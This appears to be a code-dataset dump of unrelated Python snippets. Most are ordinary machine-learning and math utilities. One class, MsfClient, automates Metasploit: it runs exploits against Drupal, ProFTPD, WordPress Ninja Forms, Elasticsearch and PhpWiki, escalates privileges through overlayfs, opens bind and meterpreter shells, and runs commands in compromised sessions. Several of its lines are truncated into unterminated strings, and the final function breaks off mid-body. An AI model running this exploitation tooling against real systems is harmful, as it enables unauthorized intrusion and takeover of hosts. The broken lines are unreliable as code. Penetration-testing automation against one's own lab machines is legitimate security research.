code stringlengths 101 5.91M |
|---|
class RandomSubsetTrainingSampler(TrainingSampler):
    """Infinite sampler over a fixed random subset of the dataset indices.

    A subset of ``int(size * subset_ratio)`` indices is drawn once, using
    ``seed_subset``; ``_infinite_indices`` then yields that same subset
    forever, reshuffling it on every pass when ``shuffle`` is enabled.
    """

    def __init__(self, size: int, subset_ratio: float, shuffle: bool=True, seed_shuffle: Optional[int]=None, seed_subset: Optional[int]=None):
        # The base class stores size/shuffle and the per-epoch shuffle seed.
        super().__init__(size=size, shuffle=shuffle, seed=seed_shuffle)

        assert 0.0 < subset_ratio <= 1.0
        self._size_subset = int(size * subset_ratio)
        assert self._size_subset > 0

        # Default to a seed shared across workers so every process picks
        # the same subset.
        if seed_subset is None:
            seed_subset = comm.shared_random_seed()
        self._seed_subset = int(seed_subset)

        # Select the subset once, deterministically from the subset seed.
        generator = torch.Generator()
        generator.manual_seed(self._seed_subset)
        permutation = torch.randperm(self._size, generator=generator)
        self._indexes_subset = permutation[:self._size_subset]

        logger.info('Using RandomSubsetTrainingSampler......')
        logger.info(f'Randomly sample {self._size_subset} data from the original {self._size} data')

    def _infinite_indices(self):
        # Deterministic per-pass shuffling, seeded by the base-class seed.
        generator = torch.Generator()
        generator.manual_seed(self._seed)
        while True:
            if not self._shuffle:
                yield from self._indexes_subset.tolist()
            else:
                order = torch.randperm(self._size_subset, generator=generator)
                yield from self._indexes_subset[order].tolist()
def validate(a_l, b_l, c_l, a_u, b_u, c_u, x_minus, x_plus, y_minus, y_plus, verify_and_modify_all=False, max_iter=100, plot=False, eps=1e-05, print_info=True):
    """Spot-check (or exhaustively sweep) that the planes ``a*x + b*y + c``
    bound the target surface on each box [x_minus, x_plus] x [y_minus, y_plus].

    For each checked neuron ``n``, ``plot_2_surface`` returns
    ``(hl - fl, hu - fu)``: lower plane minus function and upper plane minus
    function sampled over the box. Validity requires ``hl - fl <= eps`` and
    ``hu - fu >= -eps`` everywhere.

    Args:
        a_l, b_l, c_l: lower-plane coefficients (any shape, flattened here).
        a_u, b_u, c_u: upper-plane coefficients.
        x_minus, x_plus, y_minus, y_plus: per-neuron input box bounds.
        verify_and_modify_all: if True, sweep every neuron in order and nudge
            offending ``c`` offsets instead of sampling random neurons.
        max_iter: number of random spot checks (overridden by the sweep).
        plot: forwarded to ``plot_2_surface``.
        eps: tolerated violation before raising.
        print_info: print per-iteration violation statistics.

    Returns:
        ``(c_l_new, c_u_new)``: possibly adjusted offsets, in original shape.

    Raises:
        Exception: if a plane violates its bound by more than ``eps``.
    """
    original_shape = c_l.shape
    # Flatten everything so a single index addresses one neuron.
    a_l_new = a_l.view(-1)
    b_l_new = b_l.view(-1)
    c_l_new = c_l.view(-1)
    a_u_new = a_u.view(-1)
    b_u_new = b_u.view(-1)
    c_u_new = c_u.view(-1)
    x_minus_new = x_minus.view(-1)
    x_plus_new = x_plus.view(-1)
    y_minus_new = y_minus.view(-1)
    y_plus_new = y_plus.view(-1)
    N = a_l_new.size(0)
    if verify_and_modify_all:
        max_iter = N
    for i in range(max_iter):
        if verify_and_modify_all:
            n = i  # deterministic sweep over every neuron
        else:
            # Bug fix: `.long()` was previously applied unconditionally,
            # which crashed the sweep path where n is a plain Python int.
            n = torch.randint(0, N, [1]).long()
        (hl_fl, hu_fu) = plot_2_surface(x_minus_new[n], x_plus_new[n], y_minus_new[n], y_plus_new[n], a_l_new[n], b_l_new[n], c_l_new[n], a_u_new[n], b_u_new[n], c_u_new[n], plot=plot)
        if print_info:
            print(('tanh sigmoid iter: %d num: %d hl-f max %.6f mean %.6f hu-f min %.6f mean %.6f' % (i, n, hl_fl.max(), hl_fl.mean(), hu_fu.min(), hu_fu.mean())))
        if (hl_fl.max() > eps):
            # Lower plane rises above the function by more than eps: dump
            # the offending configuration and fail hard.
            print(x_minus_new[n], x_plus_new[n], y_minus_new[n], y_plus_new[n], a_l_new[n], b_l_new[n], c_l_new[n], a_u_new[n], b_u_new[n], c_u_new[n])
            plot_surface(x_minus_new[n], x_plus_new[n], y_minus_new[n], y_plus_new[n], a_l_new[n], b_l_new[n], c_l_new[n])
            print('hl-f max', hl_fl.max())
            raise Exception('lower plane fail')
            # (dead `break` after raise removed)
        if ((hl_fl.max() > 0) and verify_and_modify_all):
            # Sub-tolerance violation: push the lower plane down past it.
            c_l_new[n] = (c_l_new[n] - (hl_fl.max() * 2))
        if (hu_fu.min() < (- eps)):
            # Upper plane dips below the function by more than eps.
            print(x_minus_new[n], x_plus_new[n], y_minus_new[n], y_plus_new[n], a_l_new[n], b_l_new[n], c_l_new[n], a_u_new[n], b_u_new[n], c_u_new[n])
            plot_surface(x_minus_new[n], x_plus_new[n], y_minus_new[n], y_plus_new[n], a_u_new[n], b_u_new[n], c_u_new[n])
            print('hu-f min', hu_fu.min())
            raise Exception('upper plane fail')
        if ((hu_fu.min() < 0) and verify_and_modify_all):
            # Push the upper plane up past the violation.
            c_u_new[n] = (c_u_new[n] - (hu_fu.min() * 2))
    c_l_new = c_l_new.view(original_shape)
    c_u_new = c_u_new.view(original_shape)
    return (c_l_new, c_u_new)
def prepare_dataset(training_file: str, K: int=None):
    """Read sessions from ``training_file`` and build training data.

    Returns:
        dict with keys ``'X'`` (features) and ``'y'`` (targets).
    """
    sessions = read_sessions_from_training_file(training_file, K)
    features, targets = prepare_training_data(sessions)
    return {'X': features, 'y': targets}
_registry
class MSETuneStrategy(TuneStrategy):
    """Tuning strategy that orders fallback candidates by MSE impact.

    Ops are ranked by the mean-squared gap between their fp32 and
    dequantized activation tensors; ops with larger quantization error are
    preferred fallback candidates in ``next_tune_cfg``.
    """

    def __init__(self, model, conf, q_dataloader=None, q_func=None, eval_func=None, eval_dataloader=None, eval_metric=None, resume=None, q_hooks=None):
        """Forward all arguments to the base strategy and reset the cached op ordering."""
        super().__init__(model=model, conf=conf, q_dataloader=q_dataloader, q_func=q_func, eval_func=eval_func, eval_dataloader=eval_dataloader, eval_metric=eval_metric, resume=resume, q_hooks=q_hooks)
        logger.info('*** Initialize MSE tuning')
        # MSE-sorted op names, filled in by mse_impact_lst().
        self.ordered_ops = None

    def __getstate__(self):
        """Attach the cached op ordering to the matching tuning-history entry, then delegate pickling to the base class."""
        for history in self.tuning_history:
            if self._same_conf(history['cfg'], self.conf):
                history['ordered_ops'] = self.ordered_ops
        save_dict = super().__getstate__()
        return save_dict

    def _mse_metric_gap(self, fp32_tensor, dequantize_tensor):
        """Return the mean squared difference between the two tensors after
        min-max normalizing each of them to [0, 1] independently.
        """
        fp32_max = np.max(fp32_tensor)
        fp32_min = np.min(fp32_tensor)
        dequantize_max = np.max(dequantize_tensor)
        dequantize_min = np.min(dequantize_tensor)
        fp32_tensor = ((fp32_tensor - fp32_min) / (fp32_max - fp32_min))
        dequantize_tensor = ((dequantize_tensor - dequantize_min) / (dequantize_max - dequantize_min))
        diff_tensor = (fp32_tensor - dequantize_tensor)
        euclidean_dist = np.sum((diff_tensor ** 2))
        return (euclidean_dist / fp32_tensor.size)

    def mse_impact_lst(self, op_list: List, fp32_model, best_qmodel):
        """Rank ``(op_name, op_type)`` pairs by activation MSE between the
        fp32 model and the quantized model.

        Dumps batch-1 activations for both models through the adaptor,
        computes the normalized MSE gap per op, and returns the pairs sorted
        by that gap (sort direction follows ``self.higher_is_better``).

        NOTE(review): the ``best_qmodel`` parameter is shadowed by a fresh
        ``self.adaptor.quantize(...)`` call below — confirm whether the
        parameter is intentionally unused.
        """
        op_name_lst = [element[0] for element in op_list]
        op_mapping = {}
        for (op_name, op_type) in list(op_list):
            op_mapping[op_name] = (op_name, op_type)
        current_best_tune_cfg = self._tune_cfg_converter(self.cur_best_tuning_cfg)
        fp32_dump_content = self.adaptor.inspect_tensor(fp32_model, self.calib_dataloader, op_name_lst, [1], inspect_type='activation', save_to_disk=True, save_path='./nc_workspace/', quantization_cfg=current_best_tune_cfg)
        fp32_tensor_dict = fp32_dump_content['activation'][0]
        best_qmodel = self.adaptor.quantize(current_best_tune_cfg, self.model, self.calib_dataloader, self.q_func)
        quant_dump_content = self.adaptor.inspect_tensor(best_qmodel, self.calib_dataloader, op_name_lst, [1], inspect_type='activation', save_to_disk=True, save_path='./nc_workspace/', quantization_cfg=current_best_tune_cfg)
        dequantize_tensor_dict = quant_dump_content['activation'][0]
        # Per-op MSE gap between fp32 and dequantized activations.
        ops_mse = {op: self._mse_metric_gap(list(fp32_tensor_dict[op].values())[0], list(dequantize_tensor_dict[op].values())[0]) for op in fp32_tensor_dict}
        ordered_op_names = sorted(ops_mse.keys(), key=(lambda key: ops_mse[key]), reverse=self.higher_is_better)
        ordered_op_name_types = [op_mapping[name] for name in ordered_op_names]
        return ordered_op_name_types

    def next_tune_cfg(self):
        """Yield tuning configurations to try, as a generator.

        Stage 1: a few op-type-wise configs (early-stopped at stage1_max).
        Stage 2: fall back ops supporting both static and dynamic to dynamic.
        Stage 3: per-op fallback to bf16/fp32 ordered by MSE impact, then an
        accumulated fallback pass ordered by measured accuracy impact.
        """
        tuning_space = self.tuning_space
        calib_sampling_size_lst = tuning_space.root_item.get_option_by_name('calib_sampling_size').options
        for calib_sampling_size in calib_sampling_size_lst:
            (op_item_dtype_dict, quant_mode_wise_items, initial_op_tuning_cfg) = self.initial_tuning_cfg()
            early_stop_tuning = True
            stage1_cnt = 0
            int8_ops = (quant_mode_wise_items['static'] if ('static' in quant_mode_wise_items) else [])
            int8_ops += (quant_mode_wise_items['dynamic'] if ('dynamic' in quant_mode_wise_items) else [])
            stage1_max = min(5, len(int8_ops))
            op_wise_tuning_sampler = OpTypeWiseTuningSampler(tuning_space, [], [], op_item_dtype_dict, initial_op_tuning_cfg)
            for op_tuning_cfg in op_wise_tuning_sampler:
                stage1_cnt += 1
                if (early_stop_tuning and (stage1_cnt > stage1_max)):
                    logger.info('Early stopping the stage 1.')
                    break
                op_tuning_cfg['calib_sampling_size'] = calib_sampling_size
                (yield op_tuning_cfg)
            # Ops that support both quant modes can be switched to dynamic.
            static_dynamic_items = [item for item in tuning_space.query_items_by_quant_mode('static') if (item in tuning_space.query_items_by_quant_mode('dynamic'))]
            if static_dynamic_items:
                logger.info('Fallback all ops that support both dynamic and static to dynamic.')
            else:
                logger.info('No op support both dynamic and static')
            new_op_tuning_cfg = deepcopy(self.cur_best_tuning_cfg)
            for item in static_dynamic_items:
                new_op_tuning_cfg[item.name] = self.initial_dynamic_cfg_based_on_static_cfg(new_op_tuning_cfg[item.name])
            new_op_tuning_cfg['calib_sampling_size'] = calib_sampling_size
            (yield new_op_tuning_cfg)
            # Stage 3 starts from the best config found so far.
            best_op_tuning_cfg_stage1 = deepcopy(self.cur_best_tuning_cfg)
            for target_dtype in ['bf16', 'fp32']:
                fallback_items_lst = [item for item in int8_ops if (item in tuning_space.query_items_by_quant_mode(target_dtype))]
                if fallback_items_lst:
                    logger.info(f'Start to fallback op to {target_dtype} one by one.')
                fallback_items_name_lst = [item.name for item in fallback_items_lst]
                # Order fallback candidates by MSE impact (largest error first
                # when higher_is_better).
                ordered_op_name_types = self.mse_impact_lst(fallback_items_name_lst, self.model, self.best_qmodel)
                self.ordered_ops = [op_name for (op_name, op_type) in ordered_op_name_types]
                op_dtypes = OrderedDict(zip(ordered_op_name_types, ([target_dtype] * len(fallback_items_name_lst))))
                initial_op_tuning_cfg = deepcopy(best_op_tuning_cfg_stage1)
                # One-by-one fallback (accumulate=False) to measure each op's
                # individual accuracy impact.
                fallback_sampler = FallbackTuningSampler(tuning_space, tuning_order_lst=[], initial_op_tuning_cfg=initial_op_tuning_cfg, op_dtypes=op_dtypes, accumulate=False)
                op_fallback_acc_impact = OrderedDict()
                for (op_index, op_tuning_cfg) in enumerate(fallback_sampler):
                    op_tuning_cfg['calib_sampling_size'] = calib_sampling_size
                    (yield op_tuning_cfg)
                    # last_tune_result is populated by the caller after each yield.
                    (acc, _) = self.last_tune_result
                    op_fallback_acc_impact[fallback_items_name_lst[op_index]] = acc
                if (len(op_fallback_acc_impact) > 0):
                    # Re-order by measured accuracy impact, then fall back
                    # cumulatively (accumulate=True).
                    ordered_ops = sorted(op_fallback_acc_impact.keys(), key=(lambda key: op_fallback_acc_impact[key]), reverse=self.higher_is_better)
                    op_dtypes = OrderedDict(zip(ordered_ops, ([target_dtype] * len(fallback_items_name_lst))))
                    logger.info(f'Start to accumulate fallback to {target_dtype}.')
                    initial_op_tuning_cfg = deepcopy(best_op_tuning_cfg_stage1)
                    fallback_sampler = FallbackTuningSampler(tuning_space, tuning_order_lst=[], initial_op_tuning_cfg=initial_op_tuning_cfg, op_dtypes=op_dtypes, accumulate=True)
                    for op_tuning_cfg in fallback_sampler:
                        op_tuning_cfg['calib_sampling_size'] = calib_sampling_size
                        (yield op_tuning_cfg)
class MsfClient():
    """Convenience wrapper around a Metasploit RPC client.

    Provides session management, shell/module execution, msfconsole command
    execution, and canned wrappers for specific exploit / post / scanner
    modules. All interaction goes through a single shared msfrpcd console.
    """

    def __init__(self, password, lhost, host='127.0.0.1', port=55553):
        """Connect to msfrpcd over SSL and allocate one console for module runs."""
        self.logger = logging.getLogger('MsfClient')
        self.logger.info(f'Connecting to msfrpcd at {host}:{port}')
        self.client = MsfRpcClient(password, host=host, port=port, ssl=True)
        self.lhost = lhost
        self.console = self.client.consoles.console()

    def get_sessions(self):
        """Return the current session table (id -> session info dict)."""
        return self.client.sessions.list

    def get_sessions_filtered(self, ip=None, user=None, session_type=None):
        """Return sessions, optionally filtered by target host, username, and/or type."""
        sessions = self.get_sessions()
        if (ip is not None):
            sessions = {k: v for (k, v) in sessions.items() if (v['target_host'] == ip)}
        if (user is not None):
            sessions = {k: v for (k, v) in sessions.items() if (v['username'] == user)}
        if (session_type is not None):
            sessions = {k: v for (k, v) in sessions.items() if (v['type'] == session_type)}
        return sessions

    def run_shell_command(self, session_id, cmd, os='linux'):
        """Run a shell command in an existing session via post/multi/general/execute.

        Returns the command output extracted from the module's console log.
        Raises RuntimeError for an unknown ``os`` value.
        """
        session = self.get_sessions()[str(session_id)]
        self.logger.info(f"Running `{cmd}` at #{session_id} ({session['session_host']})")
        session_cmd = self.client.sessions.session(str(session_id))
        if (os == 'linux'):
            command_string = f'{cmd}'
        elif (os == 'windows'):
            # Windows needs an explicit cmd.exe invocation.
            command_string = f'cmd /c "{cmd}"'
        else:
            raise RuntimeError(f'Unknown OS {os}.')
        result = self.run_module(module_type='post', module_name='multi/general/execute', module_params={'COMMAND': command_string, 'SESSION': int(session_id)})

        # Extract the substring between two markers of the module output.
        def find_between(s, first, last):
            try:
                start = (s.index(first) + len(first))
                end = s.index(last, start)
                return s[start:end]
            except ValueError:
                return ''
        result = find_between(result, '[*] Response: ', '[*] Post module execution completed')
        result = result.rstrip()
        return result

    def wait_for_job(self, job_id, timeout=0):
        """Poll until the job disappears from the job list.

        Returns True when the job finished; False if ``timeout`` seconds
        (when > 0) elapsed first, in which case the job is stopped.
        """
        seconds_elapsed = 0
        while True:
            jobs = self.client.jobs.list
            if ((timeout > 0) and (seconds_elapsed >= timeout)):
                self.client.jobs.stop(job_id)
                return False
            if (str(job_id) not in jobs.keys()):
                return True
            time.sleep(1)
            seconds_elapsed += 1

    def get_session_id(self, result, rhost):
        """Parse a module's console output for a '[*] Session N created' line.

        Returns the session id as a string, or None if no session opened.
        """
        result = [line for line in result.split('\n') if ('[*] Session ' in line)]
        if (len(result) == 0):
            self.logger.info('No session created.')
            return None
        session_id = re.match('.* Session (\\d+) created .*', result[0]).group(1)
        self.logger.info(f'Opened new session #{session_id} for {rhost}')
        return session_id

    def run_module(self, module_type, module_name, module_params, payload_name=None, payload_params=None, forced_params=None, run_with_console=True, verbose=False):
        """Configure and run a Metasploit module, optionally with a payload.

        With ``run_with_console`` the console output is returned; otherwise
        the module is executed as a background job, waited on, and None is
        returned. ``forced_params`` are written straight into the module's
        run options, bypassing validation.
        """
        self.logger.info(f'Executing {module_type}:{module_name} with params {module_params}')
        module = self.client.modules.use(module_type, module_name)
        for (pkey, pval) in module_params.items():
            if (pkey == 'target'):
                # 'target' is a module attribute, not a datastore option.
                module.target = pval
            else:
                module[pkey] = pval
        if verbose:
            module.runoptions['VERBOSE'] = 'true'
            module.runoptions['DEBUG'] = 'true'
        if (payload_name is not None):
            payload = self.client.modules.use('payload', payload_name)
            for (pkey, pval) in payload_params.items():
                if (pkey == 'encoder'):
                    # Encoder selection goes through run options.
                    payload.runoptions[pkey] = pval
                else:
                    payload[pkey] = pval
        else:
            payload = None
        if (forced_params is not None):
            for (pkey, pval) in forced_params.items():
                module._runopts[pkey] = pval
        if run_with_console:
            output = self.console.run_module_with_output(module, payload=payload, timeout=180)
            self.logger.debug(output)
            return output
        else:
            job = module.execute(payload=payload)
            job_id = job['job_id']
            self.wait_for_job(job_id)
            return None

    def run_msf_command(self, cmd):
        """Execute a raw msfconsole command and collect its output (up to ~300s)."""
        self.logger.info(f'Executing msfconsole command: `{cmd}`')
        console = self.console
        # Drain any pending output before issuing the command.
        console.read()
        console.write(cmd)
        output = ''
        timer = 0
        timeout = 300
        while ((output == '') or console.is_busy()):
            time.sleep(5)
            output += console.read()['data']
            timer += 5
            if (timer > timeout):
                break
        self.logger.debug(output)
        return output

    def add_route(self, ip, mask, session_id):
        """Add a pivot route through the given session."""
        cmd = f'route add {ip}/{mask} {session_id}'
        self.run_msf_command(cmd)

    def exploit_drupal_coder_exec(self, rhost):
        """Exploit Drupal coder RCE; returns the new session id or None."""
        result = self.run_module(module_type='exploit', module_name='unix/webapp/drupal_coder_exec', module_params={'RHOSTS': rhost, 'TARGETURI': '/drupal'}, payload_name='cmd/unix/bind_netcat', payload_params={'LPORT': 8181})
        return self.get_session_id(result, rhost)

    def exploit_proftpd_modcopy_exec(self, rhost):
        """Exploit ProFTPD mod_copy RCE; returns the new session id or None."""
        result = self.run_module(module_type='exploit', module_name='unix/ftp/proftpd_modcopy_exec', module_params={'RHOSTS': rhost, 'SITEPATH': '/var/www/uploads/', 'TARGETURI': '/uploads/'}, payload_name='cmd/unix/bind_perl', payload_params={'LPORT': 8181})
        return self.get_session_id(result, rhost)

    def exploit_wp_ninja_forms_unauthenticated_file_upload(self, rhost):
        """Exploit WP Ninja Forms file upload, then catch the shell with a handler."""
        # NOTE(review): the next line appears corrupted/truncated (unterminated
        # string literals; module_name and payload URL are cut off) — recover
        # the original from version control before use.
        result = self.run_module(module_type='exploit', module_name='multi/ module_params={'RHOSTS': rhost, 'TARGETURI': '/wordpress/', 'FORM_PATH': 'index.php/king-of-hearts/', 'RPORT': '80', 'AllowNoCleanup': True}, payload_name='php/download_exec', payload_params={'URL': '
        result = self.run_module(module_type='exploit', module_name='multi/handler', module_params={}, payload_name='windows/meterpreter/bind_tcp', payload_params={'RHOST': rhost, 'LPORT': 4444})
        return self.get_session_id(result, rhost)

    def exploit_elasticsearch_script_mvel_rce(self, rhost):
        """Exploit Elasticsearch MVEL script RCE; returns the session id or None."""
        result = self.run_module(module_type='exploit', module_name='multi/elasticsearch/script_mvel_rce', module_params={'RHOSTS': rhost}, payload_name='java/meterpreter/bind_tcp', payload_params={'LPORT': 4444}, forced_params={'LHOST': None})
        return self.get_session_id(result, rhost)

    def exploit_phpwiki_ploticus_exec(self, rhost):
        """Exploit PhpWiki Ploticus RCE; returns the session id or None."""
        # NOTE(review): the next line appears corrupted/truncated (unterminated
        # module_name string) — recover the original from version control.
        result = self.run_module(module_type='exploit', module_name='multi/ module_params={'RHOSTS': rhost, 'TARGETURI': '/phpwiki/'}, payload_name='generic/shell_bind_tcp', payload_params={'LPORT': 8181, 'encoder': 'php/base64'})
        return self.get_session_id(result, rhost)

    def privesc_overlayfs_priv_esc(self, rhost, session_id):
        """Escalate privileges via overlayfs on an existing session; returns the new session id."""
        result = self.run_module(module_type='exploit', module_name='linux/local/overlayfs_priv_esc', module_params={'SESSION': session_id, 'target': 0}, payload_name='linux/x86/shell/bind_tcp', payload_params={'RHOST': rhost, 'LPORT': 8181})
        return self.get_session_id(result, rhost)

    def post_shell_to_meterpreter(self, session_id):
        """Upgrade a shell session to meterpreter, catching it with a bind handler."""
        self.run_module(module_type='post', module_name='multi/manage/shell_to_meterpreter', module_params={'SESSION': session_id, 'LPORT': 8181, 'HANDLER': False, 'PAYLOAD_OVERRIDE': 'linux/x86/meterpreter/bind_tcp'})
        # Give the staged payload time to start listening.
        time.sleep(5)
        rhost = self.get_sessions()[str(session_id)]['target_host']
        result = self.run_module(module_type='exploit', module_name='multi/handler', module_params={}, payload_name='linux/x86/meterpreter/bind_tcp', payload_params={'RHOST': rhost, 'LPORT': 8181})
        return self.get_session_id(result, rhost)

    def scan_portscan(self, rhosts, ports, threads=10):
        """TCP port scan; returns a list of 'ip:port' strings found open."""
        result = self.run_module(module_type='auxiliary', module_name='scanner/portscan/tcp', module_params={'RHOSTS': rhosts, 'PORTS': ports, 'THREADS': threads})
        result = [line for line in result.split('\n') if ('TCP OPEN' in line)]
        result = [re.match('.*- ([\\.\\d:]+) - .*', x).group(1) for x in result]
        self.logger.info(f'Scan result: {result}')
        return result

    def scan_dir_scanner(self, rhosts, port, threads=1):
        """Scan an HTTP service for directories; returns the matched folder list."""
        # NOTE(review): the next line appears corrupted/truncated (unterminated
        # module_name and DICTIONARY strings) — recover the original from
        # version control before use.
        result = self.run_module(module_type='auxiliary', module_name='scanner/ module_params={'RHOSTS': rhosts, 'RPORT': port, 'THREADS': threads, 'DICTIONARY': '/vagrant/ run_with_console=True)
        result = [line for line in result.split('\n') if (('[+] Found' in line) and (' 200 ' in line))]
        print(result)
        # NOTE(review): this regex has no capture group matching group(1) as
        # written — confirm the intended pattern.
        result = [re.match('.* [0-9]+ .*', x).group(1) for x in result]
        self.logger.info(f'Folders found on the Http service: {result}')
        return result

    def scan_ping_sweep(self, rhosts, session_id):
        """Ping sweep through a session; returns the list of live host IPs."""
        result = self.run_module(module_type='post', module_name='multi/gather/ping_sweep', module_params={'RHOSTS': rhosts, 'SESSION': session_id})
        result = [line for line in result.split('\n') if ('host found' in line)]
        result = [re.match('.*\\t([\\.\\d]+) .*', x).group(1) for x in result]
        self.logger.info(f'Scan result: {result}')
        return result

    def scan_os_smb(self, rhost):
        """Fingerprint the OS via SMB version scan; returns a list of 'linux'/'windows'/None."""
        result = self.run_module(module_type='auxiliary', module_name='scanner/smb/smb_version', module_params={'RHOSTS': rhost}, run_with_console=True)
        nresult = []
        for line in result.split('\n'):
            if ('Host is running' in line):
                nresult.append(('linux' if ('Samba' in line) else ('windows' if ('Windows' in line) else None)))
            elif ('Host could not be identified:' in line):
                nresult.append(('linux' if ('Samba' in line) else ('windows' if (re.search('Windows.*Windows', line) is not None) else None)))
        self.logger.info(f'Scan result: {nresult}')
        return nresult

    def get_os_by_cmd(self, session_id):
        """Detect the session OS by probing shell commands; returns 'linux', 'windows', or None."""
        if ('Linux' in self.run_shell_command(session_id, 'uname')):
            return 'linux'
        if ('Windows' in self.run_shell_command(session_id, 'cmd /c ver', os='windows')):
            return 'windows'
        if ('Linux' in self.run_shell_command(session_id, 'cat /proc/version')):
            return 'linux'
        self.logger.warning(f'Os detection failed for session {session_id}')
        return None

    def is_session_meterpreter(self, session_id):
        """Return True if the given session exists and is a meterpreter session."""
        sessions = self.get_sessions()
        if (session_id not in sessions):
            self.logger.warning(f'Impossible to check session type, session {session_id} not found')
            return False
        return (sessions[session_id]['type'] == 'meterpreter')
def dobldobl_solve(pols, verbose=True, tasks=0, dictionary_output=False, verbose_level=0):
    """Solve a Laurent polynomial system in double double precision.

    Args:
        pols: list of polynomial strings.
        verbose: when True, print the root counts reported by the solver.
        tasks: number of tasks for multithreaded solving (0 = sequential).
        dictionary_output: when True, return solutions as dictionaries.
        verbose_level: verbosity passed through to the solver.

    Returns:
        The list of solutions (strings, or dicts if dictionary_output).
    """
    from phcpy.phcpy2c3 import py2c_syscon_clear_dobldobl_Laurent_system
    from phcpy.phcpy2c3 import py2c_syscon_initialize_number_of_dobldobl_Laurentials
    from phcpy.phcpy2c3 import py2c_syscon_store_dobldobl_Laurential
    from phcpy.phcpy2c3 import py2c_solcon_clear_dobldobl_solutions
    from phcpy.phcpy2c3 import py2c_solve_dobldobl_Laurent_system
    from phcpy.interface import load_dobldobl_solutions
    # Reset both the system and solution containers before storing.
    py2c_syscon_clear_dobldobl_Laurent_system()
    py2c_solcon_clear_dobldobl_solutions()
    dim = len(pols)
    py2c_syscon_initialize_number_of_dobldobl_Laurentials(dim)
    # Store each polynomial; container indices are 1-based.
    for ind, pol in enumerate(pols):
        py2c_syscon_store_dobldobl_Laurential(len(pol), dim, ind + 1, pol)
    silent = not verbose
    if silent:
        py2c_solve_dobldobl_Laurent_system(silent, tasks, verbose_level)
    else:
        rc, counts = py2c_solve_dobldobl_Laurent_system(silent, tasks, verbose_level)
        if counts != '':
            print(counts)
    sols = load_dobldobl_solutions()
    if not dictionary_output:
        return sols
    from phcpy.solutions import formdictlist
    return formdictlist(sols, 'dd')
class CascadingBandit(Environment):
    """Cascading click-model bandit environment.

    The user scans the recommended list top-down and clicks the first
    attractive item; each item's attraction probability is drawn once from
    Beta(a0, b0) at construction time.
    """

    def __init__(self, num_items, num_positions, a0, b0):
        assert num_items >= num_positions
        self.num_items = num_items
        self.num_positions = num_positions
        self.a0 = a0
        self.b0 = b0
        # One independent Beta(a0, b0) click probability per item.
        self.probs = np.array([np.random.beta(a0, b0) for a in range(num_items)])
        # Best slate shows the num_positions most attractive items; reward is
        # the probability of at least one click.
        descending = np.sort(self.probs)[::-1]
        self.optimal_reward = 1 - np.prod(1 - descending[:num_positions])
        # Feedback from the most recent round.
        self.round_failure = []
        self.round_success = []

    def get_observation(self):
        """Return the latest round's examined-without-click / clicked items."""
        return {'round_failure': self.round_failure, 'round_success': self.round_success}

    def get_optimal_reward(self):
        """Expected reward of the best possible slate."""
        return self.optimal_reward

    def get_expected_reward(self, action_list):
        """Probability that at least one item in the slate is clicked."""
        assert len(action_list) == self.num_positions
        slate_probs = self.probs[action_list]
        return 1 - np.prod(1 - slate_probs)

    def get_stochastic_reward(self, action_list):
        """Simulate one round: scan the slate in order, stop at the first click.

        Records examined-but-unclicked items in round_failure and the clicked
        item (if any) in round_success. Returns 1 on a click, else 0.
        """
        assert len(action_list) == self.num_positions
        self.round_failure = []
        self.round_success = []
        for item in action_list:
            click = np.random.binomial(1, self.probs[item])
            if click == 1:
                self.round_success += [item]
                return click
            self.round_failure += [item]
        return 0
class SimpleDatasetPredictor(DatasetPredictorBase):
    """Runs an OfflinePredictor over a dataset, one datapoint at a time."""

    def __init__(self, config, dataset):
        super(SimpleDatasetPredictor, self).__init__(config, dataset)
        self.predictor = OfflinePredictor(config)

    def get_result(self):
        """Yield the predictor output for each datapoint, with a progress bar."""
        self.dataset.reset_state()
        # The dataset size may be unknown; then hide the progress bar.
        try:
            total = self.dataset.size()
        except NotImplementedError:
            total = 0
        with get_tqdm(total=total, disable=(total == 0)) as progress:
            for datapoint in self.dataset.get_data():
                yield self.predictor(datapoint)
                progress.update()
def get_bound_for_relu(l, u, adaptive=False):
    """Elementwise linear relaxation of ReLU given pre-activation bounds.

    Given l <= x <= u, returns slopes/intercepts (kl, bl, ku, bu) such that
    kl*x + bl <= relu(x) <= ku*x + bu elementwise.

    Args:
        l, u: tensors of lower/upper pre-activation bounds (same shape).
        adaptive: if True, the lower slope for unstable neurons is 0 or 1
            (whichever side of zero dominates) instead of matching the
            upper chord's slope.

    Returns:
        (kl, bl, ku, bu) tensors, same shape and device as the inputs.
        bl is always zero: every lower bound used passes through the origin.
    """
    device = l.device
    ku = torch.zeros(u.shape, device=device)
    bu = torch.zeros(u.shape, device=device)
    kl = torch.zeros(l.shape, device=device)
    bl = torch.zeros(l.shape, device=device)
    # Always-active neurons (l >= 0): ReLU is the identity on both sides.
    active = l >= 0
    kl[active] = 1
    ku[active] = 1
    # Always-inactive neurons (u <= 0) keep the zero slopes/intercepts.
    # Unstable neurons crossing zero. (Idiom fix: combine boolean masks with
    # `&` rather than `*`, and compute the crossing mask once.)
    crossing = (l < 0) & (u > 0)
    k = (u / (u - l))[crossing]
    # Upper bound is the chord from (l, 0) to (u, u): slope k, intercept -k*l.
    ku[crossing] = k
    bu[crossing] = (1 - k) * u[crossing]
    if not adaptive:
        # Default lower bound: same slope as the chord, through the origin.
        kl[crossing] = k
    else:
        # Adaptive lower bound: slope 1 when the positive side dominates
        # (|u| >= |l|), else slope 0.
        kl[crossing & (u.abs() >= l.abs())] = 1
        kl[crossing & (u.abs() < l.abs())] = 0
    return (kl, bl, ku, bu)
def four_models(df, name, startday, k, three=False, c0=1, mu=0.5):
    """Walk forward in time and collect k-day-ahead forecasts from four models.

    For each day i in [startday, len(df)-k], fit on days [0, i) and predict
    day i+k-1 with: separate linear, separate exponential, shared
    exponential, and (unless ``three``) the ensemble model.

    Args:
        df: per-day counts (array-like with .shape and .reshape).
        name: series name used for the single-row model DataFrame.
        startday: first day index to forecast from.
        k: forecast horizon in days.
        three: if True, skip the ensemble (its array is returned empty).
        c0, mu: ensemble weighting hyperparameters.

    Returns:
        [linear, separate-exp, shared-exp, ensemble] as np.arrays.
    """
    lin_future_predictions = []
    sep_exp_future_predictions = []
    shared_exp_future_predictions = []
    ensemble = []
    for i in range(startday, (df.shape[0] - k) + 1):
        tmp = df[:i]
        d = {'Name': [name], 'hospitalizations': [tmp]}
        df_mod = pd.DataFrame(data=d)
        shared_future_pred = fit_and_predict_shared_exponential(df_mod, mode='predict_future', outcome='hospitalizations', demographic_vars=[], target_day=np.array([k]), verbose=False)
        shared_exp_future_predictions.append(shared_future_pred[0][0])
        if not three:  # idiom fix: was `three == False`
